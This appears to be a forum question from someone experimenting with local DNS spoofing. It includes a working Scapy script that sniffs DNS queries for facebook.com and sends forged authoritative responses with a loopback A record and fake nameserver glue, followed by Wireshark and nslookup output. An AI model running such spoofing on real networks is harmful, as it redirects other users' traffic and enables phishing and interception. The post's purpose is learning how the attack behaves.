I am looking into local DNS spoofing by sniffing DNS-requests with Scapy, and sending a spoofed packet in response.
Here is the code I used:
from scapy.all import *
def spoof_dns(pkt):
if (DNS in pkt and b'facebook.com' in pkt[DNS].qd.qname):
IPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)
UDPpkt = UDP(dport=pkt[UDP].sport, sport=53)
Anssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=259200, rdata='127.0.0.1')
NSsec1 = DNSRR(rrname='facebook.com', type='NS', ttl=259200, rdata='ns1.facebook.com')
NSsec2 = DNSRR(rrname='facebook.com', type='NS', ttl=259200, rdata='ns2.facebook.com')
Addsec1 = DNSRR(rrname='ns1.facebook.com', type='A', ttl=259200, rdata='1.3.3.7')
Addsec2 = DNSRR(rrname='ns2.facebook.com', type='A', ttl=259200, rdata='7.3.3.1')
DNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1,qdcount=1, ancount=1, nscount=2, arcount=2, an=Anssec, ns=NSsec1/NSsec2, ar=Addsec1/Addsec2)
spoofpkt = IPpkt/UDPpkt/DNSpkt
send(spoofpkt)
pkt = sniff(filter='udp and dst port 53', prn=spoof_dns)
Wireshark shows me the following:
> Standard Query 0x0007 A facebook.com
< Standard query Response 0x0007 A facebook.com A 127.0.0.1 NS ns1.facebook.com NS ns2.facebook.com A 1.3.3.7 A 7.3.3.1 (==> My spoofed response)
< Standard query response 0x0007 A facebook.com A 179.60.195.36 (==> The actual response, after mine).
This is the result of running nslookup like this:
> set type=A
> facebook.com
Server: dns.google
Address: 8.8.8.8
Non-authoritative answer:
Name: facebook.com
Address: 179.60.195.36
How come nslookup reports 179.60.195.36 as the A record, allthough we can clearly see in wireshark that my spoofed packet comes back first?
Wireshark also marks the second (official) packet as a "UDP Retransmission". Are retransmissions given priority over the original?
